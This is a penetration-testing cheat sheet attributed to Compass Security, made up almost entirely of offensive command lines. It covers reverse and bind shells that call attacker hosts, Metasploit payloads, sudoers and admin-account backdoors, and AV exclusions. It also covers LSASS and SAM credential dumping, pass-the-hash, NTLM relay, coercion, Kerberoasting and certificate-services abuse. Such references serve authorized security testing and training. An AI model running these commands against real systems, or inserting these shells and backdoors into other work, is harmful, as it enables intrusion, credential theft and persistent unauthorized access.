Hacking Tools Cheat Sheet
v2.0, September 2023, Compass Security
https://www.compass-security.com

Basic Linux Networking

Show IP configuration:
$ ip addr show

Change MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up

Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0
# ip route add default via 10.5.23.1

DNS and reverse DNS lookup:
$ dig compass-security.com
$ dig -x 10.5.23.42

Information Gathering

Find owner of domain or IP address:
$ whois compass-security.com

Get nameservers and try DNS zone transfer:
$ dig example.com ns
$ dig example.com axfr @n1.example.com

Use multiple sources for hostname discovery:
$ subfinder -d csnc.ch -all

Sources for hostname / subdomain discovery:
▪ crt.sh, virustotal.com, dnsdumpster.com

Public internet scan databases:
▪ shodan.io, censys.io

Network Scanning

Useful nmap options:
▪ -n: Disable name and port resolution
▪ -PR: ARP host discovery
▪ -Pn: Disable host discovery
▪ -sn: Disable port scan (host discovery only)
▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan
▪ --top-ports 50: Scan 50 top ports
▪ -iL file: Host input file
▪ -oA file: Write output files (3 file formats)
▪ -sC: Script scan (default scripts)
▪ --script <file/category>: Specific scripts
▪ -sV: Version detection
▪ -6: IPv6 scan
▪ --open: Do not wait for RST (improves speed)
▪ -v/-d: Verbose / debugging output

Specify target via CIDR 10.5.23.0/24, ranges 10.13-37.5.1-23 or input file -iL scope.txt.

Reverse DNS lookup of IP address range:
# nmap -sL 10.5.23.0/24

ARP host discovery:
# nmap -n -sn -PR 10.5.23.0/24

Host discovery (ARP, ICMP, SYN 443, ACK 80):
# nmap -sn -n 10.5.23.0/24

SYN scan (half-open scan = SYN/SYN-ACK/RST):
# nmap -Pn -n -sS -p 22,80 10.5.23.42

List nmap scripts:
$ ls /usr/share/nmap/scripts

Scan for EternalBlue vulnerable hosts (SMB, port 445):
# nmap -n -Pn -p 445 --script smb-vuln-ms17-010 10.5.23.0/24

Scan for vulnerabilities (script category filter):
# nmap -n -Pn --script "vuln and safe" 10.5.23.0/24

Run script on non-default port using +:
# nmap -n -Pn -p 80 --script +http-title compass-security.com

Performance Tuning (1 SYN packet ≈ 60 bytes → 20'000 packets/s ≈ 10 Mbps):
# nmap -n -Pn --min-rate 20000 10.5.23.0/24

Sniffing

ARP spoofing:
# arpspoof -t 10.5.23.42 10.5.23.1

GUI version:
# ettercap -G

Show / delete ARP cache:
$ ip neigh show
# ip neigh flush all

Sniff traffic:
# tcpdump [options] [filters]

Useful tcpdump options:
▪ -i interface: Interface or any for all
▪ -n: Disable name and port resolution
▪ -A: Print in ASCII
▪ -XX: Print in hex and ASCII
▪ -w file: Write output PCAP file
▪ -r file: Read PCAP file

Useful tcpdump filters:
▪ not arp: No ARP packets
▪ port ftp or port 23: Only port 21 or 23
▪ host 10.5.23.31: Only from/to host
▪ net 10.5.23.0/24: Only from/to networks

Use tshark or Wireshark for advanced sniffing.

Sniffing over SSH on a remote host:
$ ssh 10.5.23.42 sudo tcpdump -w- port not ssh | wireshark -k -i -

Search in traffic, show HTTP traffic or images:
# ngrep -i pass; urlsnarf; driftnet

IP

Test IP forwarding for a specific MAC address:
# nping -e eth0 --tcp -p 443 --dest-mac 23:05:13:37:42:21 8.8.8.8

TCP

Listen on TCP port:
$ ncat -vnlp 2305

Connect to TCP port:
$ ncat -v 10.5.23.42 2305

TLS

Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.net/"

Start TLS server:
$ openssl s_server -cert cert.pem -key key.pem -port 2305
$ ncat --ssl -l -p 2305 --ssl-cert cert.pem --ssl-key key.pem

Connect to TLS service:
$ openssl s_client -connect 10.5.23.42:2305
$ ncat --ssl 10.5.23.42 2305

Show certificate details of full chain:
$ openssl s_client -showcerts -connect 10.5.23.42:2305 | openssl x509 -text

Test TLS server certificate and protocols/ciphers:
$ sslyze compass-security.com:443

TCP to TLS proxy:
$ socat TCP-LISTEN:2305,fork,reuseaddr ssl:example.com:443

Online TLS tests: ssllabs.com, hardenize.com

HTTP

Start Python webserver on port 2305:
$ python3 -m http.server 2305

Start webserver for data up/download:
$ goshs -s -ss -p 2305 -b user:hunter2

Perform HTTP request:
$ curl http://10.5.23.42:2305/?foo=bar

Useful curl options:
▪ -k: Accept untrusted certificates
▪ -d "foo=bar": HTTP POST data
▪ -H "Foo: Bar": HTTP header
▪ -I: Perform HEAD request
▪ -L: Follow redirects
▪ -o foobar.html: Write output file
▪ --proxy http://127.0.0.1:8080: Set proxy

Scan for common files/applications/configs:
# nikto -host https://example.net

Enumerate common directory-/filenames:
$ feroxbuster -u https://example.net -w wordlist.txt

Get wordlists (raft*, wellknown*, quickhits):
▪ GitHub danielmiessler/SecLists
▪ GitHub fuzzdb-project/fuzzdb

Shells

Start bind shell (on victim):
$ ncat -vnlp 2305 -e "/bin/bash -i"

Connect to bind shell (on attacker):
$ ncat -v 10.5.23.42 2305

Listen for reverse shell (on attacker):
$ ncat -vnlp 2305

Start reverse shell (on victim):
$ ncat -e "/bin/bash -i" 10.5.5.5 2305
$ bash -i &>/dev/tcp/10.5.23.5/42 0>&1

More shells on revshells.com.

Upgrade to more functional pseudo terminal:
victim $ python -c 'import pty; pty.spawn("/bin/bash")'
victim $ ^Z # press Ctrl-Z
attacker $ stty -a # get ROWS/COLS
attacker $ stty raw -echo
attacker $ fg # press enter twice
victim $ stty rows <ROWS> cols <COLS>
victim $ export TERM=xterm-256color

Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, https://compass-security.com 1
Vulnerability DBs and Exploits

Exploit search (local copy of the Exploit-DB):
$ searchsploit apache

Show exploit file path and copy it into clipboard:
$ searchsploit -p 40142

Online vulnerability and exploit databases:
▪ cvedetails.com, exploit-db.com, packetstormsecurity.com

Cracking

Online brute force SSH passwords:
# ncrack -p 22 --user root -P passwords.txt 10.5.23.0/24

Determine hash type:
# hashid 869d[...]bd88

Show example hash types for hashcat:
$ hashcat --example-hashes

Crack hashes (e.g. type 1000 for NTLM):
$ hashcat -m 1000 -a 0 hash.txt -r rules.txt /opt/wordlists/*

Crack hashes using John the Ripper:
$ john --wordlist=pwds.txt hash.txt

Metasploit Framework

Start Metasploit, search & use exploit:
# msfconsole
msf > search eternalblue
msf > use exploit/windows/smb/ms17_…
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42
msf exploit(…) > exploit

Generate reverse shell (WAR):
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip address> LPORT=443 -f war > sh.war

Reverse shell listener:
msf > use exploit/multi/handler
msf > set payload linux/x64/shell_reverse_tcp
msf > set LHOST 10.5.23.42 # attacker
msf > set LPORT 443
msf > exploit

Upgrade to Meterpreter:
background # or press Ctrl-Z ^Z
background session 1? [y/N] y
msf > sessions # list sessions
msf > sessions -u 1 # upgrade
msf > sessions 2 # interact
meterpreter > sysinfo # use it

File exchange / execute binary:
meterpreter > upload beacon.exe
meterpreter > download c:\keepass.kdb
meterpreter > execute -i -f /your/bin

Port forwarding to localhost:
meterpreter > portfwd add -l 2323 -p 3389 -r 10.5.23.23

Background Meterpreter session:
meterpreter > background

Pivoting through existing Meterpreter session:
msf > use post/multi/manage/autoroute
msf > set session 2 # meterpreter sess
msf > run
msf > route

SOCKS via Meterpreter (requires autoroute):
msf > use auxiliary/server/socks4a
msf > set SRVPORT 8080
msf > run

Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080

Connect through SOCKS proxy:
# proxychains ncat 172.23.5.42 2305

Linux Privilege Escalation

Check for common privesc techniques:
▪ GitHub carlospolop/PEASS-ng → linPEAS
▪ GitHub rebootuser/LinEnum
▪ GTFOBins: gtfobins.github.io

Set SUID bit to shell and start root shell:
# chmod +s $(which sh)
$ sh -p

Add SUDO backdoor user:
# echo "user ALL=(ALL:ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README

Lateral Movement Linux

Sniff SSH passwords:
# strace -p "$(pgrep -f /usr/sbin/sshd)" -f -e trace=write

SSH agent hijacking:
# export SSH_AUTH_SOCK=/tmp/ssh…/agent
# ssh-add -l

Windows Privilege Escalation

Bypass PowerShell execution policy:
PS > Set-ExecutionPolicy -Policy bypass -Scope process

Use AMSI bypasses from amsi.fail.

Check for common privesc techniques:
▪ GitHub carlospolop/PEASS-ng → winPEAS
▪ GitHub itm4n/PrivescCheck
▪ GitHub PowerShellMafia/PowerSploit → PowerUp.ps1

Exploit WSUS updates delivered via HTTP:
$ pywsus --host 10.5.23.42 --port 8530 --executable /opt/psexec64.exe --command '/accepteula /s cmd.exe /c "powershell.exe -encodedCommand J[…]"'

Add new local admin to persist after privesc:
C:\> net user backdoor hunter2
C:\> net localgroup Administrators backdoor /add

Add AV exclusion:
PS > Add-MpPreference -ExclusionPath C:\tmp\

Windows Credentials Gathering

Start Mimikatz and create log file:
C:\> mimikatz.exe
mimikatz # log C:\tmp\mimikatz.log
mimikatz # privilege::debug

Show passwords/hashes of logged in users:
mimikatz # sekurlsa::logonpasswords

Dump lsass.exe using taskmgr or:
PS > (Get-Process -Name lsass).Id
PS > procdump.exe -accepteula -ma <pid> c:\lsass.dmp
PS > rundll32.exe C:\windows\System32\comsvcs.dll MiniDump <pid> C:\lsass.dmp full

Read LSASS process dump:
mimikatz # sekurlsa::minidump lsass.dmp
$ pypykatz lsa minidump lsass.dmp

Dump LSASS remotely:
$ lsassy -u admin -H e8[…]97 hostname

Export SYSTEM & SAM hive for local users:
C:\> reg save HKLM\SYSTEM system.hiv
C:\> reg save HKLM\SAM sam.hiv

Dump hashes from SYSTEM & SAM file:
mimikatz # lsadump::sam /system:system.hiv /sam:sam.hiv
$ secretsdump.py -sam sam.hiv -system system.hiv local

Dump local user hashes remotely:
$ secretsdump.py example.net/alice:hunter2@hostname
$ crackmapexec -u admin --local-auth -H :01[…]D03 10.5.23.0/24 --sam

DCSync:
$ secretsdump.py -just-dc -just-dc-user alice example.net/admin:s3cret@dc
mimikatz # lsadump::dcsync /user:alice

Scan for network shares:
$ smbmap.py --host-file hosts.txt -u Administrator -p PasswordOrHash

Active Directory

Start process with network credentials:
C:\> runas /netonly /user:example.net\alice powershell.exe

Analyze AD & create report using PingCastle:
C:\> PingCastle.exe --healthcheck --explore-trust --explore-forest-trust --no-enum-limit

Gather BloodHound data using SharpHound:
C:\> SharpHound.exe -c All,GPOLocalGroup

Query AD using PowerView:
PS > Import-Module PowerView.ps1
PS > Get-Domain
PS > Get-DomainUser
PS > Get-DomainTrust
PS > Get-DomainComputer
PS > Get-DomainController
PS > Get-DomainGroupMember -Recurse -Identity "Domain Admins"

Pass-the-Hash

Remote shell:
$ psexec.py -hashes :23[…]05 domain/username@10.5.23.42

Alternatives: smbexec.py, wmiexec.py.

Network Shares

Search for juicy files on domain joined systems:
C:\> snaffler.exe -s -o snaffler.log
Access shares:
$ smbclient.py -hashes :23[…]05 example.net/alice@10.5.23.42

Spray hash over a subnet:
$ crackmapexec smb 10.0.1.0/24 -u alice -d example.net -H 23[…]05

Enable restricted admin mode:
PS > New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name DisableRestrictedAdmin -Value 0 -PropertyType DWORD -Force

RDP (requires restricted admin mode):
$ xfreerdp /u:alice /d:example.net /pth:23[…]05 /v:10.5.23.42

RDP using mimikatz:
mimikatz # sekurlsa::pth /user:alice /domain:example.net /ntlm:23[…]05 /run:"mstsc.exe /restrictedadmin"

NTLM Relay

Vulnerable if message signing disabled:
# nmap -n -Pn -p 445 --script smb-security-mode 10.5.23.0/24

Generate relay list:
$ crackmapexec smb 10.5.23.0/24 --gen-relay-list targets-smb.txt

Disable SMB and HTTP in Responder.conf and start Responder for LLMNR/NBT-NS poisoning:
# responder -I eth0

NTLM Relay to target and extract SAM file:
# ntlmrelayx.py -smb2support -t smb://10.5.23.42

NTLM Relay using socks proxy:
# ntlmrelayx.py -tf targets.txt -smb2support -socks

Configure ProxyChains & access files via proxy:
$ proxychains smbclient.py example.net/alice:InvalidPw@10.5.23.42

Coercion / Connection Triggering

Coerce via shortcut file (clickme.lnk):
[InternetShortcut]
URL=https://google.com
IconIndex=0
IconFile=\\10.5.23.42\icon.ico

Coerce via PrinterBug (Print Spooler Service):
$ printerbug.py example.net/alice:pwd@victim attacker
mimikatz # misc::spooler /connect:victim /server:attacker

Coerce via PetitPotam (EFS remote protocol):
$ PetitPotam.py -u alice -p hunter2 -d example.net attacker victim
mimikatz # misc::efs /connect:victim /server:attacker

Coerce using multiple different techniques:
$ Coercer.py coerce -u alice -p hunter2 --target victim --listener-ip attacker

Password Spraying

Display password policy:
C:\> net accounts /domain

Password spraying for all domain users:
C:\> rubeus.exe brute /password:s3cret

Password spraying for certain users:
C:\> rubeus.exe brute /users:users.txt /passwords:passwords.txt
$ kerbrute passwordspray --dc 10.0.0.5 -d example.net users.txt hunter2

Kerberos

List Kerberos tickets:
C:\> klist
C:\> rubeus.exe klist
C:\> rubeus.exe triage /nowrap

Dump Kerberos keys:
mimikatz # sekurlsa::ekeys

Get TGT for current user:
C:\> rubeus.exe tgtdeleg

Get TGT for specific user:
C:\> rubeus.exe asktgt /user:alice /domain:example.net /password:pwd /ptt

Pass-the-key using /rc4, /aes128 or /aes256.

Pass-the-Ticket:
C:\> Rubeus.exe ptt /ticket:doI[…]=

Dump tickets (luid from rubeus klist):
C:\> rubeus.exe dump /luid:0x234205 /nowrap

Import ticket:
C:\> rubeus.exe ptt /ticket:doI[…]=

Get ST:
C:\> rubeus.exe asktgs /ticket:doI[…]= /service:cifs/dc.example.net /ptt

S4U2Self (machine account to local admin):
C:\> rubeus.exe asktgt /nowrap /domain:example.net /user:"MYHOST$" /aes256:23[...]05
C:\> rubeus.exe s4u /self /nowrap /impersonateuser:domainadmin /altservice:cifs/server.example.net /ticket:doI[…]=

Kerberoasting

Get users with SPN:
PS > Get-DomainUser -SPN

Kerberoast (hashcat mode 13100):
C:\> rubeus.exe kerberoast /outfile:hashes.txt

Get users which do not require preauth:
PS > Get-DomainUser -UACFilter DONT_REQ_PREAUTH

AS-REP roast (hashcat mode 18200):
C:\> rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

Kerberos Delegation

Get unconstrained delegation systems:
PS > Get-DomainComputer -Unconstrained

Watch for forwardable tickets:
C:\> rubeus.exe monitor /interval:10

Coerce DC, import ticket & DCSync to privesc.

Get constrained delegation systems:
PS > Get-DomainUser -TrustedToAuth
PS > Get-DomainComputer -TrustedToAuth

Get ST using constrained delegation account:
C:\> rubeus.exe s4u /domain:example.net /user:sql_user /rc4:23[…]05 /impersonateuser:alice /msdsspn:cifs/server.example.net /altservice:host /ptt /nowrap

DACL / Shadow Credentials

Use GenericAll/GenericWrite to add certificate:
C:\> whisker.exe add /target:alice

Get NTLM hash via PKINIT/U2U:
C:\> rubeus.exe asktgt /user:alice /certificate:MI[…]= /password:hunter2 /domain:example.net /dc:dc.example.net /getcredentials /show

Remove certificate to cleanup:
C:\> whisker.exe clean /target:alice

Active Directory Certificate Services

List CAs & find vulnerable templates:
C:\> certify.exe cas
C:\> certify.exe find /vulnerable

Request certificate with specified subject:
C:\> certify.exe request /ca:ca.example.net\CA /template:ESC1 /altname:bob /install

Use certificate to get Kerberos ticket:
C:\> rubeus.exe asktgt /ptt /user:bob /certificate:crt.pfx /password:hunter2 /domain:example.net /dc:dc.example.net

NTLM relay to HTTP enrollment endpoint:
$ ntlmrelayx.py -t http://10.5.23.42/certsrv/certfnsh.asp -smb2support --adcs --template Machine

MS SQL

Use PowerUpSQL & get instances:
PS > Import-Module PowerUpSQL.ps1
PS > $t = Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" }; $t

Get information & vulnerabilities:
PS > $t | Get-SQLServerInfo
PS > $t | Invoke-SQLAudit -v

Coerce (alternatively xp_fileexist):
PS > Get-SQLQuery -Verbose -Query "EXEC master.sys.xp_dirtree '\\10.5.23.42\x',1,1" -Instance "mssql.example.net,1433"

Command execution (requires sysadmin):
PS > Invoke-SQLOSCmd -Command "whoami" -Rawresults -Instance "mssql…,1433"

Useful Online Resources

▪ Compass Link Collection: git.io/secres
▪ The Hacker Recipes: thehacker.recipes
▪ The Hacker Tools: tools.thehacker.recipes
▪ Hacktricks: book.hacktricks.xyz
▪ Red Team Notes: ired.team
▪ Get the latest cheat sheet version at GitHub: CompassSecurity/Hacking_Tools_Cheat_Sheet